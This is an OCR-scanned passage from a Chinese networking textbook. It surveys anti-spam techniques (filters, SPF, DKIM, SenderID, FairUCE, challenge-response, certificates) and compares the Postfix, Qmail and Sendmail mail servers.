器 。 针 对 关键 词 列表 ,可 以 随机 更 改 一 些 单词 的 拼写 ,如 “强悍 ”",“ 马 虽 悍 ”“ 强 - 悍 ”。Hash- 
Buster( 在 每 个 邮件 中 产生 不 同 的 HASH) 就 是 来 绕 过 hash 过 滤器 的 。 当 前 普遍 使 用 的 贝 
叶 斯 过 滤器 可 以 通过 插入 随机 单词 或 句子 来 绕 过 。 多 数 过 滤器 最 多 只 能 在 少数 几 周 才 最 有 
效 ,为 了 保持 反 垃 圾 邮件 系统 的 实用 性 ,过 滤器 规则 就 必须 不 断 更 新 ,比如 每 天 或 者 每 周 
更 新 。 

@ 误 报 问题 : 最 头痛 的 问题 就 是 将 正常 邮件 判断 为 垃圾 邮件 。 比 如 一 封包 含 单词 
Sample 的 正常 邮件 可 能 因此 被 判断 为 垃圾 邮件 , 某 些 正常 服务 器 并 不 是 因为 发 送 了 垃圾 邮 
件 , 而 被 包含 在 不 负责 任 的 组 织 发 布 的 Black List 对 某 个 网 段 进行 屏蔽 的 范围 中 ,但 是 如 果 
要 减少 误 报 问题 ,就 可 能 造成 严重 的 漏 报 问 题 。 

@ 过 滤器 复查 : 由 于 误 报 问 题 的 存在 ,通常 被 标记 为 垃圾 邮件 的 消息 一 般 不 会 被 立刻 
删除 ,而 是 被 放置 在 垃圾 邮件 箱 里 ,以 便 日 后 检查 。 但 这 也 意味 着 用 户 仍然 需要 花费 时 间 去 
删除 垃圾 邮件 。 

虽然 过 滤器 可 以 帮助 用 户 来 区 分 垃圾 邮件 和 正常 邮件 ,但 是 过 滤器 技术 并 不 能 阻止 垃 
圾 邮件 , 它 实 际 上 只 是 在 处理 "垃圾 邮件 。 尽 管 过 滤器 技术 存在 局 限 , 但 这 是 目前 使 用 的 最 
为 广泛 的 反 垃圾 邮件 技术 。 


2. 验证 查询 


SMTP 在 设计 的 时 候 并 没有 考虑 到 安全 问题 。 尽 管 SMTP 的 命令 组 已 经 发 展 了 很 长 
时 间 , 但 是 人 们 还 是 以 RFC524 为 基础 来 执行 SMTP, 而 且 还 都 假定 问题 (比如 安全 问题 ) 会 
在 以 后 被 解决 。 因 此 ,直到 2004 年 , 源 自 RFC524 中 的 错误 还 依然 存在 ,这 个 时 候 SMTP 
已 经 变 得 非常 广泛 而 很 难 简 单 地 被 代替 。 垃 圾 邮件 就 是 一 个 滥用 SMTP 协议 的 例子 ,多 数 
垃圾 邮件 工具 都 可 以 伪造 邮件 头 ,伪造 发 送 者 或 者 隐藏 源头 。 

垃圾 邮件 一 般 都 使 用 伪造 的 发 送 者 地 址 , 极 少数 垃圾 邮件 使 用 真实 地 址 。 垃 圾 邮件 发 
送 者 伪造 邮件 有 下 面 的 几 个 原因 。 

@ 因为 是 违法 的 : 在 很 多 国家 ,发送 垃圾 邮件 都 是 违法 的 ,通过 伪造 发 送 地 址 ,发 送 者 
就 可 能 避免 被 起 诉 。 
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@ 因为 不 受 欢 迎 : 垃圾 邮件 发 送 者 都 明白 垃圾 邮件 是 不 受 欢迎 的 ,通过 伪造 发 送 者 地 
址 ,就 可 能 减少 这 种 反应 。 

@ 受到 了 ISP 的 限制 : 多 数 ISP 都 有 防止 垃圾 邮件 的 服务 条 款 , 通 过 伪造 发 送 者 地 址 ,可 
以 减少 被 ISP 禁止 网 络 访问 的 可 能 性 。 

因此 ,如 果 用 户 能 够 采用 类 似 黑 白 名 单 的 反 垃圾 邮件 技术 ,就 能 够 更 智能 地 识别 哪些 是 
伪造 的 邮件 、 哪 些 是 合法 的 邮件 ,那么 就 能 从 很 大 程度 上 解决 垃圾 邮件 问题 ,验证 查询 技术 
就 是 基于 这 样 的 出 发 点 而 产生 的 。 下 面 将 解析 一 些 主要 的 反 垃 圾 邮件 技术 ,如 Yahoo( 雅 
虎 )、Microsoft 和 IBM 所 倡导 和 主持 的 反 垃 圾 邮件 技术 ,从 某 种 角度 来 说 ,这 些 技 术 应 用 都 
是 更 加 复杂 的 验证 查询 。 

(1) 反 向 查询 技术 

从 垃圾 邮件 的 伪造 角度 来 说 ,能 够 解决 邮件 的 伪造 问题 ,就 可 以 避免 大 量 垃圾 邮件 的 产 
生 。 为 了 限制 伪造 发 送 者 地 址 ,一 些 系统 要 求 验 证 发 送 者 邮件 地 址 ,这 些 系统 包括 : 反 向 邮 
件 交 换 (RMX) 发 送 者 许可 (SPF) 和 标明 邮件 协议 (DMP) 。 

当 发 送 邮 件 的 时 候 , 邮 件 服务 器 通过 查询 MX( 邮 件 交 换 纪 录 ) 纪 录 来 对 应 接收 者 的 域 
名 。 类 似 于 MX 纪录 , 反 向 查询 解决 方案 就 是 定义 反 向 的 MX 纪录 ,并 以 此 判断 邮件 的 指 
定 域名 和 IP 地 址 是 否 是 完全 对 应 的 。 主 要 利用 伪造 邮件 的 地 址 不 会 真实 来 自 RMX 地 址 ， 
从 而 判断 邮件 是 否 是 伪造 的 。 

(2) DKIM 技术 

DKIM(DomainKeys Identified Mail) 技 术 基 于 雅虎 的 DomainKeys 验证 技术 和 思科 的 
Internet Identified Mtail 。 

雅虎 的 DomainKeys 利用 公共 密 钥 密 码 术 验证 电子 邮件 发 件 人 。 发 送 系统 生成 一 个 签 
名 并 把 签名 插入 电子 邮件 标题 ,而 接收 系统 利用 DNS 发 布 的 一 个 公共 密 钥 验证 这 个 签名 。 
思科 的 验证 技术 也 利用 密码 术 , 但 它 把 签名 和 电子 邮件 消息 本 身 关 联 。 发 送 服务 器 为 电子 
邮件 消息 签名 并 把 签名 和 用 于 生成 签名 的 公共 密 钥 插入 一 个 新 标题 。 而 接收 系统 验证 这 个 
用 于 为 电子 邮件 消息 签名 的 公共 密 钥 是 授权 给 这 个 发 件 地 址 使 用 的 。 

DKIM 将 把 这 两 个 验证 系统 整合 起 来 。 它 将 和 DomainKeys 相同 的 方式 用 DNS 发 布 
的 公共 密 钥 验证 签名 , 它 也 将 利用 思科 的 标题 签名 技术 确保 一 致 性 。 

DKIM 给 邮件 提供 了 一 种 机 制 来 同时 验证 每 个 域 的 邮件 发 送 者 和 消息 的 完整 性 。 一 旦 
域 能 被 验证 ,就 用 来 同 邮件 中 的 发 送 者 地 址 做 比较 ,进而 检测 是 否 伪 造 。 如 果 是 伪造 ,那么 
可 能 是 垃圾 邮件 或 者 是 欺骗 邮件 ,就 可 以 丢弃 。 如 果 不 是 伪造 的 ,并 且 域 是 已 知 的 ,可 为 其 
建立 起 良好 的 声誉 ,并 绑 定 到 反 垃 圾 邮件 策略 系统 中 ,也 可 以 在 服务 提供 商 之 间 共 享 ,甚至 
直接 提供 给 用 户 。 

对 于 知名 公司 来 说 ,通常 需要 发 送 各 种 业务 邮件 给 客户 银行, 这样 ,邮件 的 确认 就 显得 很 
重要 。 现 在 ,DKIM 技术 标准 提交 给 IETF, 可 以 参考 draft 文档 ,网 址 : http://www. ietf. org/ 
internet-drafts/draft-delany-domainkeys-base-00. txt。 

下 面 介 绍 DomainKeys 的 实现 过 程 。 

发 送 服务 器 要 经 过 两 个 步骤 : 

@ 建立 。 域 所 有 者 需要 产生 一 对 公 / 私 钥 用 于 标记 所 有 发 出 的 邮件 (允许 多 对 密 钥 )， 
公 钥 在 DNS 中 公开 , 私 钥 在 使 用 DomainKeys 的 邮件 服务 器 上 。 
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@ 签名 。 当 每 个 用 户 发 送 邮件 的 时 候 , 邮 件 系统 自动 使 用 存储 的 私 钥 来 产生 签名 。 签 
名 作为 邮件 头 的 一 部 分 ,然后 随 邮 件 一 起 被 传递 到 接收 服务 器 上 。 

接收 服务 器 要 通过 三 步 来 验证 签名 邮件 。 

@ 准备 。 接 收服 务 器 从 邮件 头 提取 出 签名 和 发 送 域 (from) ,然后 从 DNS 获得 相应 的 
公 钥 。 
@ 验证 。 接 收服 务 器 用 从 DNS 获得 的 公 钥 来 验证 用 私 钥 产生 的 签名 。 保 证 邮件 真实 
发 送 并 且 没有 被 修改 过 。 

@ 传递 。 接 收服 务 器 使 用 本 地 策略 来 做 出 最 后 结果 ,如 果 域 被 验证 了 ,而 且 其 他 的 反 
垃圾 邮件 测试 也 没有 检测 位 垃圾 邮件 ,那么 邮件 就 被 传递 到 用 户 的 收 件 箱 中 ; 否则 ,邮件 可 
以 被 抛弃 、 隔 离 。 

(3) SenderID 技术 

SenderID 技术 主要 包括 两 个 方面 : 发 送 邮 件 方 的 支持 和 接收 邮件 方 的 支持 。 其 中 发 送 邮 
件 方 的 支持 主要 有 三 个 部 分 : 发 信人 需要 修改 邮件 服务 器 的 DNS, 增 加 特定 的 SPF 记录 以 
表明 其 身份 ,如 “v= 二 spf1 ip4: 192. 0. 2. 0/24-all”, 表 示 使 用 SPF1 版 本 ,对 于 192. 0. 2. 0/24 
这 个 网 段 是 有 效 的 ; 在 可 选择 的 情况 下 ,发 信人 的 MTA 支持 在 其 外 发 邮件 的 发 信和 通信 协 
议 中 增加 Submitter 等 扩展 ,并 在 其 邮件 中 增加 Resent-Sender、Resent-From、Sender 等 
信 头 。 

接收 邮件 方 的 支持 有 : 收 信人 的 邮件 服务 器 必须 采用 SenderID 检查 技术 ,对 收 到 的 邮 
件 检查 Pra 或 Mailfrom ,查询 发 信人 DNS 的 SPF 纪录 ,并 以 此 验证 发 信人 身份 。 

因此 ,采用 Sender ID 技术 ,其 整个 过 程 如 下 : 

@ 发 信人 撰写 邮件 并 发 送 。 

@ 邮件 转移 到 接收 邮件 服务 器 。 

@ 接收 邮件 服务 器 通过 SenderID 技术 对 发 信人 所 声称 的 身份 进行 检查 (该 检查 通过 
DNS 的 特定 查询 进行 )。 

@ 如 果 确 认 发 信人 所 声称 的 身份 和 其 发 信 地 址 相 匹 配 ,那么 接收 该 邮件 ; 否则 ,对 该 
邮件 采取 特定 操作 ,例如 直接 拒 收 该 邮件 或 者 将 其 作为 垃圾 邮件 处 理 。 

SenderID 技术 实际 上 并 不 能 根除 垃圾 邮件 , 它 只 是 一 个 解决 垃圾 邮件 发 送 源 的 技术 ， 
而 垃圾 邮件 发 送 者 可 以 通过 注册 廉价 的 域名 来 发 送 垃圾 邮件 ,SenderID 就 会 认为 这 样 的 邮 
件 是 符合 规范 的 。 垃 圾 邮件 发 送 者 还 可 以 通过 别人 的 邮件 服务 器 的 漏洞 转发 其 垃圾 邮件 ， 
这 是 SenderID 技术 所 不 能 解决 的 。 

更 为 重要 的 是 ,SenderID 技术 是 Microsoft 公司 推出 的 , 它 在 开放 源 代码 的 阵营 中 是 不 
被 支持 的 。 

(4) FairUCE 技术 

FairUCE(Fair use of Unsolicited Commercial Email) 由 IBM 开发 ,该 技术 使 用 网 络 领 
域 的 内 置身 份 管理 工具 ,通过 分 析 电 子 邮件 域名 过 滤 并 封锁 垃圾 邮件 。 

FairUCE 把 收 到 的 邮件 同 其 源头 的 IP 地 址 相 链接 , 即 在 电子 邮件 地 址 .电子 邮件 域 和 
发 送 邮件 的 计算 机 之 间 建 立 起 一 种 联系 ,以 确定 电子 邮件 的 合法 性 。 如 采用 SPF 或 者 其 他 
方法 。 如 果 能 够 找到 关系 ,那么 检查 接收 方 的 黑白 名 单 ,以 及 域名 声名 ,以 此 决定 对 该 邮件 
的 操作 ,如 接收 .拒绝 等 。 
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FairUCE 还 有 一 个 功能 ,就 是 通过 溯源 找到 垃圾 邮件 的 发 送 源头 ,并 且 将 那些 传递 过 
来 的 垃圾 邮件 再 回复 给 发 送 源头 ,以 此 来 打击 垃圾 邮件 发 送 者 。 这 种 做 法 的 好 处 就 是 能 够 
影响 垃圾 邮件 发 送 源头 的 性 能 ,坏处 就 是 可 能 波及 到 正常 的 服务 器 (如 被 利用 的 ) 的 正常 工 
作 , 同 时 该 功能 又 产生 了 大 量 垃圾 流量 。 
(5) 局 限 性 和 缺点 
以 上 的 解决 方案 都 具有 一 定 的 可 用 性 ,但 是 也 存在 以 下 一 些 缺点 。 
QO@ 非 主机 或 空 的 域名 : 反 向 查询 方法 要 求 邮 件 来 自己 知 的 并 且 信任 的 邮件 服务 器 ,而 
且 对 应 合理 IP 地 址 ( 反 向 MX 纪录 )。 但 是 ,多 数 的 域名 实际 上 并 不 与 完全 静态 的 IP 地 址 
对 应 。 通 常情 况 下 ,个 人 和 小 公司 也 希望 拥有 自己 的 域名 ,但 是 ,并 不 能 提供 足够 的 IP 地 址 
来 满足 要 求 。DNS 注册 主机 ,比如 GoDaddy, 向 那些 没有 主机 或 只 有 空域 名 的 人 提供 免费 
邮件 转发 服务 。 这 种 邮件 转发 服务 只 能 管理 接收 的 邮件 ,而 不 能 提供 邮件 发 送 服务 。 
反 向 查询 解决 方案 对 没有 主机 或 者 只 有 空域 名 的 用 户 造成 如 下 问题 。 
。 没有 反 向 MX 记录 。 现 在 通过 配置 邮件 客户 端 就 可 以 用 自己 注册 的 域名 能 发 送 邮 
件 。 但 是 ,要 用 反 向 查询 发 送 者 域名 的 IP 地 址 就 根本 找 不 到 。 特 别 是 对 于 那些 移 
动 的 ,拨号 的 和 其 他 会 频繁 改变 自己 IP 地 址 的 用 户 。 
。 不 能 发 送 邮件 。 要 解决 上 面 的 问题 ,有 一 个 办 法 就 是 通过 ISP 的 服务 器 来 转发 邮 
件 , 这 样 就 可 以 提供 一 个 反 向 MX 纪录 ,但 是 只 要 发 送 者 的 域名 和 ISP 的 域名 不 一 
样 ,ISP 是 不 允许 转发 邮件 的 。 
在 上 述 两 种 情况 下 ,这 些 用 户 都 会 被 反 向 查询 系统 拦截 掉 。 
@ 合法 域名 : 能 验证 身份 ,并 不 一 定 就 是 合法 的 身份 ,如 垃圾 邮件 发 送 者 可 以 通过 注 
册 廉 价 的 域名 来 发 送 垃圾 邮件 ,从 技术 的 角度 来 看 ,一 切 都 是 符合 规范 的 ; 还 有 目前 很 多 垃 
圾 邮件 发 送 者 可 以 通过 别人 的 邮件 服务 器 漏洞 进入 合法 邮件 系统 来 转发 其 垃圾 邮件 ,这 些 
问题 对 于 验证 查询 来 说 还 无 法 解决 。 


3. 挑战 技术 


垃圾 邮件 发 送 者 使 用 一 些 自 动 邮件 发 送 软件 每 天 可 以 发 送 数 百 万 封 垃圾 邮件 。 挑 战 的 
技术 通过 延缓 邮件 处 理 过 程 ,可 以 阻碍 大 量 邮件 发 送 者 。 那 些 只 发 送 少量 邮件 的 正常 用 户 
不 会 受到 明显 的 影响 。 但 是 ,挑战 的 技术 只 在 很 少 人 使 用 的 情况 下 获得 了 成 功 。 如 果 在 更 
普及 的 情况 下 ,可 能 人 们 更 关心 的 是 是 否 会 影响 到 邮件 传递 ,而 不 是 是 否 阻碍 垃圾 邮件 。 

这 里 介绍 两 种 主要 的 挑战 形式 : 挑战 一 一 响应 (Challenge Response, CR) 和 计算 性 挑 
战 (Computational Challenges,CC) 。 

(1) 挑战 一 响应 

挑战 一 响应 系统 保留 着 许可 发 送 者 的 列表 。 一 个 新 的 邮件 发 送 者 发 送 的 邮件 将 被 临时 
保留 下 来 而 不 立即 被 传递 ,然后 向 这 个 邮件 发 送 者 返回 一 封包 含 挑 战 的 邮件 (挑战 可 以 是 连 
接 URL 或 者 是 要 求 回 复 ) 。 当 完成 挑战 后 ,新 的 发 送 者 则 被 加 入 到 许可 发 送 者 列表 中 。 对 
于 那些 使 用 假 邮件 地 址 的 垃圾 邮件 来 说 ,它们 不 可 能 接收 到 挑战 ,而 如 果 使 用 真实 邮件 地 
址 ,又 不 可 能 回复 所 有 的 挑战 。 这 说 明 CR 系统 还 是 有 许多 局 限 性 。 

CR 死 锁 。 假 如 Alice 告诉 Bill 要 给 朋友 Charlie 发 送 邮 件 。Bill 发 送 一 个 邮件 给 
Charlie,Charlie 的 CR 系统 临时 中 断 邮 件 ,并 发 送 给 Bill 一 个 挑战 。 但 是 Bill 的 CR 系统 又 
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会 中 断 Charlie 发 送 过 来 的 挑战 邮件 ,并 发 送 自己 的 挑战 。 结 果 是 用 户 都 没有 接收 到 挑战 ， 
也 无 法 回复 邮件 。 而 且 用 户 也 无 法 知道 ,这 是 在 挑战 过 程 中 发 生 了 问题 。 因 此 ,如 果 双 方 都 
使 用 CR 系统 ,就 可 能 无 法 进行 沟通 。 

自动 系统 问题 。 邮 件 列表 或 者 那些 自动 系统 ,如 一 些 网 站 的 “发 送 给 朋友 ”功能 ,就 不 可 
能 回应 挑战 。 

(2) 计算 性 挑战 

现在 也 提出 了 计算 性 挑战 方案 ,如 通过 增加 发 送 邮件 的 “费用 ”。 多 数 CC 系统 使 用 复 
杂 的 算法 来 有 意 拖延 时 间 。 对 于 单个 用 户 来 说 ,这 种 拖延 很 难 被 察觉 ,但 是 对 于 发 送 大 量 邮 
件 的 垃圾 邮件 发 送 者 来 说 ,这 就 意味 着 要 花费 很 多 时 间 了 。CC 系统 的 实例 如 Hash Cash 。 
但 是 即便 如 此 ,CC 系统 还 是 会 影响 快速 通信 而 不 仅仅 是 影响 垃圾 邮件 。 计 算 机 挑战 的 局 
限 性 有 以 下 几 点 。 

Qa 不 平等 影响 : 计算 性 挑战 是 以 CPU、 内 存 和 网 络 为 基础 的 ,如 在 1GHz 计算 机 上 挑 
战 可 能 花费 10s, 但 是 在 500MHz 计算 机 上 就 需要 花费 20s。 

@ 邮件 列表 : 许多 邮件 列表 都 有 数 千 ,甚至 数 百 万 的 接收 者 。 如 Bug Tragq, 就 可 能 会 
被 看 作 垃 圾 邮件 。CC 系统 来 处 理 邮 件 列表 是 不 现实 的 。 如 果 垃 圾 邮件 发 送 有 办 法 通过 合 
法 的 邮件 列表 来 绕 过 挑战 ,那么 也 就 有 办 法 绕 过 其 他 的 挑战 了 。 

@ 机 器 人 程序 : Sobig 或 者 其 他 像 垃圾 邮件 一 样 的 病毒 ,能 让 垃圾 邮件 发 送 者 控制 大 
量 的 计算 机 。 这 样 就 能 够 用 大 量 的 系统 来 均衡 "费用 ”了 。 

当前 ,计算 性 挑战 还 没有 广泛 应 用 ,因为 这 种 技术 还 不 能 解决 垃圾 邮件 问题 ,反而 可 能 
会 干扰 正常 用 户 。 


4. 证 书 技术 


现在 还 提出 了 采用 密码 技术 来 验证 邮件 发 送 者 的 方案 。 从 本 质 上 来 说 ,这 些 系统 采用 
证 书 方式 来 提供 证 明 。 如 果 没 有 适当 的 证 书 ,伪造 的 邮件 就 很 容易 被 识别 出 来 。 

目前 的 邮件 协议 (SMTP) 不 能 直接 支持 加 密 验 证 。 研 究 中 的 解决 方案 扩展 了 SMTP 
(比如 S/MIME,PGP/MIME 和 AMTP) ,还 有 一 些 其 他 的 邮件 协议 则 打算 代替 现在 的 邮件 
体系 ,比如 MTP。 

在 采用 证 书 的 时 候 , 比 如 X. 509 或 TLS, 某 些 证 书 管理 机 构 必 须 可 用 ,但 是 ,如 果 证 书 
存储 在 DNS ,那么 私 钥 就 必须 在 验证 的 时 候 可 用 。( 换 句 话说 ,如 果 垃 圾 邮件 发 送 者 可 以 访 
问 这 些 私 钥 ,那么 也 就 可 以 产生 有 效 的 公 钥 )。 另 一 方面 ,也 要 用 到 主要 的 证 书 管理 机 构 
(CA) ,但 是 ,邮件 是 一 种 分 布 式 系 统 , 没 有 人 和 希望 所 有 的 邮件 都 由 单独 的 CA 来 控制 。 有 一 
些 解决 办 法 是 允许 多 个 CA 系统 ,如 X. 509 就 会 确定 可 用 的 CA 服务 器 。 这 种 扩展 性 也 导 
致 垃圾 邮件 发 送 者 可 以 运行 私有 的 CA 服务 器 。 

如 果 没 有 证 书 管理 机 构 ,就 需要 通过 其 他 的 途径 在 发 送 者 和 接收 者 之 间 来 分 发 密 
钥 。 例 如 ,PGP, 就 可 以 预先 共享 公 钥 。 在 未 连接 网 络 或 者 比较 封闭 的 群 组 中 ,这 种 办 法 
是 可 行 的 ,但 是 在 大 量 个 体 使 用 的 时 候 , 就 不 是 太 适 合 了 ,特别 是 对 于 需要 建立 新 的 联系 
的 情况 。 从 本 质 上 来 说 ,预先 共享 密 钥 有 些 类 似 白 名 单 的 过 滤器 : 只 有 彼此 知道 的 人 才 
能 发 送 邮件 。 

不 幸 的 是 ,这 些 解 决 方案 还 是 不 能 阻止 垃圾 邮件 ,例如 ,假设 其 中 的 一 种 加 密 方案 被 广 
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泛 接受 了 ,但 不 能 确认 邮件 地 址 是 真实 的 ,而 只 能 确认 发 送 者 有 邮件 的 正确 密 钥 。 这 有 以 下 
缺点 。 

滥用 自动 化 工具 : 如 果 在 广大 范围 内 被 应 用 ,就 需要 有 一 种 办 法 为 所 有 用 户 产 生 证 
书 或 者 密 钥 (包括 邮件 服务 器 端 ,邮件 客户 端 ) ,依赖 于 相应 的 解决 办 法 ,系统 很 可 能 通过 一 
种 自动 化 的 方法 来 提供 密 钥 。 可 是 ,垃圾 邮件 发 送 者 也 会 滥用 任何 自动 化 系统 ,并 且 用 来 发 
送 经 认证 的 垃圾 邮件 。 

@ 可 用 性 问题 : 如 果 CA 服务 器 不 可 用 怎么 办 ? 邮件 被 挂 起 、 退 回 、 还 是 依然 可 用 ? 垃 
圾 邮件 发 送 者 近来 对 一 半 以 上 提供 黑 名 单 的 网 站 进行 了 拒绝 服务 攻击 ,并 导致 这 些 网 站 无 
法 被 访问 。 显 然 , 这 些 垃圾 邮件 发 送 者 想 阻止 别人 更 新 黑 名 单 。 对 于 单一 的 CA 服务 器 , 显 
然 也 无 法 避免 这 样 的 命运 。 

从 技术 上 来 说 ,一 种 新 的 反 垃圾 邮件 技术 必然 会 导致 出 现 一 种 对 应 的 垃圾 邮件 技术 , 况 
且 任 何 一 种 技术 都 没有 办 法 去 解决 所 有 问题 ,技术 的 发 展 也 将 延续 下 去 。 总 之 ,现在 很 多 反 
垃圾 邮件 方案 所 采用 的 都 不 会 只 是 一 种 技术 ,而 是 多 种 多 类 技术 的 综合 


9.5 邮件 服务 器 的 比较 


在 Linux 环境 下 可 以 选择 的 免费 邮件 服务 器 软件 中 ,比较 常见 的 有 Sendmail、 Qmail、 
Postfix、Exim 及 Zmailer 等 。 在 Windows 平台 上 最 有 名 的 是 Exchange Server。 

Postfix 是 在 IBM 资助 下 由 Wietse Venema 负责 开发 的 自由 软件 工程 的 一 个 产物 ,其 
目的 是 为 用 户 提供 除 Sendmail 之 外 的 邮件 服务 器 以 做 选择 。Postfix 力图 做 到 快速 ,易于 
管理 ,提供 尽 可 能 的 安全 性 ,同时 尽量 做 到 和 Sendmail 邮件 服务 器 保持 兼容 性 以 满足 用 户 
的 使 用 习惯 。 起 初 ,Postfix 是 以 VMailer 这 个 名 字 发 布 的 ,后 来 由 于 商标 上 的 原因 改名 为 


Postfix。 
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Postfix 作为 一 款 十 分 有 特色 的 邮件 服务 器 软件 ,具有 以 下 特点 。 

。 支持 多 传输 域 : Sendmail 支持 在 Internet、DECnet、X. 400 及 UUCP 之 间 转 发 消息 。 

Postfix 则 被 设计 为 无 须 虚拟 域 (virtual domain) 或 别名 来 实现 这 种 转发 。 但 其 早期 

发 布 的 版 本 仅仅 支持 STMP 和 有 限度 地 支持 UUCP, 对 于 我 国 用 户 来 说 ,对 多 传输 

域 的 支持 没有 什么 实际 意义 。 

虚拟 域 : 在 大 多 数 通 用 情况 下 ,增加 对 一 个 虚拟 域 的 支持 仅 需 改变 一 个 查找 信息 表 

即 可 。 而 其 他 的 邮件 服务 器 则 通常 需要 多 个 级 别 的 别名 或 重 定向 来 获得 这 样 的 

效果 。 

UCE 控制 (UCE,Unsolicited Commercial Email) : Postfix 能 限制 哪个 主机 允许 通 

过 自身 转发 邮件 ,并 且 支 持 限定 什么 邮件 允许 接 进 。Postfix 实现 的 控制 功能 包括 : 

黑 名 单列 表 、RBL 查找 .HELO/ 发 送 者 DNS 核实 。 当 前 还 没有 实现 基于 内 容 的 

过 滤 。 

。 表 查 看 : Postfix 没有 地 址 重 写 语言 ,而 是 使 用 了 一 种 扩展 的 表 查 看 来 实现 地 址 重 写 
功能 。 表 可 以 是 本 地 dbm 或 db 文件 等 格式 。 
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设计 Postfix 的 目标 就 是 使 其 成 为 Sendmail 的 替代 者 。 因 此 ,Postfix 系统 的 很 多 部 
分 ,如 本 地 投递 程序 等 ,可 以 很 容易 地 通过 编辑 修改 类 似 Inetd 的 配置 文件 来 蔡 代 。 

Postfix 的 核心 是 由 十 多 个 半 驻 留 程序 组 成 的 。 为 了 保证 机 密 性 ,这 些 Postfix 进程 之 
间 通 过 UNIX 的 Socket 或 受 保 护 的 目录 下 的 FIFO 进行 通信 。 即 使 使 用 这 种 方法 来 保证 
机 密 性 ,Postfix 进程 也 并 不 盲目 信任 其 通过 这 种 方式 接收 到 的 数据 。 

Postfix 进程 之 间 传 递 的 数据 量 是 有 限制 的 。 在 很 多 情况 下 ,Postfix 进程 之 间 交 换 的 
数据 信息 只 有 队列 文件 名 和 接收 者 列表 或 某 些 状态 信息 。 一 旦 一 个 邮件 消息 被 保存 进入 文 
件 , 其 将 被 一 直 保 存 , 直 到 被 一 个 邮件 投递 程序 读 出 。 

Postfix 采用 一 些 通常 的 措施 来 避免 丢失 信息 ,比如 ,在 收 到 确认 以 前 通过 调用 Flush 
和 Fsync() 保 存 所 有 的 数据 到 磁盘 中 ,检查 所 有 的 系统 调用 的 返回 结果 来 避免 错误 状况 。 


952 Qmail 的 特点 


Qmail 是 Dan Bernstein 开发 的 可 以 自由 下 载 的 MTA, 其 第 一 个 beta 版 本 0. 7 发 布 于 
1996 年 1 月 24 日 ,1997 年 2 月 发 布 了 1.0 版 ,当前 版 本 是 1.03。 

Qmail 具有 以 下 特点 。 

。 安全 性 高 : 为 了 验证 Qmail 的 安全 性 ,Qmail 的 支持 者 出 资 1000 美元 悬赏 寻找 
Qmail 的 安全 漏洞 ,一 年 以 后 ,该 奖金 没有 被 领取 ,而 被 捐献 给 自由 软件 基金 会 。 目 
前 ,Qmail 的 作者 也 出 资 500 美元 来 寻求 Qmail 的 安全 漏洞 。 

。 投递 速度 快 : Qmail 在 一 个 中 等 规模 的 系统 可 以 投递 大 约 百 万 封 邮件 ,甚至 在 一 台 
奔腾 486 计算 机 一 天 上 能 处 理 超过 10 万 封 的 邮件 , 且 支 持 并 行 投递 。Qmail 支持 
邮件 的 并 行 投递 ,可 以 同时 投递 大 约 20 封 邮件 。 目 前 邮件 投递 的 瓶颈 在 于 SMTP 
协议 ,通过 STMP 向 另外 一 台 互 联网 主机 投递 一 封 电子 邮件 大 约 需要 花费 10s。 
Qmail 的 作者 提出 了 QMTP(Quick Mail Transfer Protocol) 来 加 速 邮件 的 投递 ,并 
且 在 Qmail 中 得 到 支持 。Qmail 的 设计 目标 是 在 一 台 内 存 16MB 的 机 器 上 最 终 达 
到 每 天 可 以 投递 大 约 百 万 级 数目 的 邮件 。 

。 可 靠 性 高 : 为 了 保证 可 靠 性 ,Qmail 只 有 在 邮件 被 正确 地 写 入 到 磁盘 时 才 返 回 处 理 
成 功 的 结果 ,这样 ,即使 在 磁盘 写 信 过程 中 发 生 系统 崩溃 或 断 电 等 情况 ,也 可 以 保证 
邮件 不 被 丢失 ,而 只 是 要 重新 投递 邮件 。 

。 特别 简单 的 虚拟 域 管理 : 有 一 个 第 三 方 开发 的 称 为 Vpopmail 的 add-on 来 支持 虚拟 
POP 域 。 使 用 这 个 软件 包 ,POP3 用 户 不 需要 具有 系统 的 正式 账户 。 

Qmail 的 缺点 就 是 配置 方式 和 Sendmail 不 一 致 ,不 容易 维护 。 而 且 Qmail 的 版 权 许 可 

证 含义 非常 模糊 ,甚至 没有 和 软件 一 起 发 布 。 应 用 作者 的 话 :“ 若 你 希望 分 发 自己 修改 的 
Qmail 版 本 ,你 必须 得 到 我 的 许可 。” 


953 Sendmail 与 Qmail 的 比较 


Sendmail 是 发 展 历史 悠久 的 MTA, 当 前 的 版 本 是 8. 10. 2。 当 然 ,Sendmail 在 可 移植 
性 、 稳 定性 及 确保 没有 Bug 方面 有 一 定 的 保证 ,Sendmail 在 发 展 过 程 中 产生 了 一 批 经 验 丰 
富 的 Sendmail 管理 员 ,并 且 Sendmail 有 大 量 完整 的 文档 资料 ,除了 Sendmail 的 宝典 以 外 ， 
网 络 上 有 大 量 的 Tutorial、FAQ 和 其 他 的 资源 。 这 些 大 量 的 文档 对 于 如 何 很 好 地 利用 
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Sendmail 的 各 种 特色 功能 是 非常 重要 的 。Sendmai 是 一 个 成 熟 的 MTA。 

当然 ,Sendmail 也 有 一 些 缺 点 ,其 特色 功能 过 多 而 导致 配置 文件 的 复杂 性 增加 。 虽 然 ， 
通过 使 用 M4 宏 使 配置 文件 的 生成 变 得 容易 很 多 。 但 是 ,要 掌握 所 有 的 配置 选项 是 一 个 很 
不 容易 的 事情 。Sendmail 在 以 前 的 版 本 中 出 现 过 很 多 安全 漏洞 ,所 以 使 管理 员 不 得 不 升级 
版 本 。 而 且 Sendmail 的 流行 性 也 使 其 成 为 攻击 的 目标 ,这 有 好 处 也 有 坏处 ,这 意味 着 安全 
漏洞 可 以 很 快 地 被 发 现 ,同样 也 可 以 使 Sendmail 更 加 稳定 和 安全 。 另 外 一 个 问题 是 
Sendmail 的 一 般 默 认 配 置 都 具有 最 小 的 安全 特性 ,从 而 使 Sendmail 很 容易 被 攻击 。 如 果 使 
用 Sendmail, 应 该 理解 每 个 打开 的 选项 的 含义 和 影响 。 一 旦 理解 了 Sendmail 的 工作 原理 ， 
Sendmail 的 安装 和 维护 就 变 得 非常 容易 了 。 通 过 Sendmail 的 配置 文件 ,用 户 可 以 实现 完成 
一 切 想象 得 到 的 需求 。 

Qmail 在 其 设计 实现 中 特别 考虑 了 安全 问题 。 如 果 需 要 一 个 快速 的 解决 方案 ,如 一 个 
安全 的 邮件 网 关 , 则 Qmail 是 一 个 很 好 的 选择 。Qmail 和 Sendmail 的 配置 文件 完全 不 同 。 
对 于 Qmail, 它 有 自己 的 配置 文件 ,配置 目录 中 包含 了 5 一 30 个 不 同 的 文件 ,各 个 文件 实现 
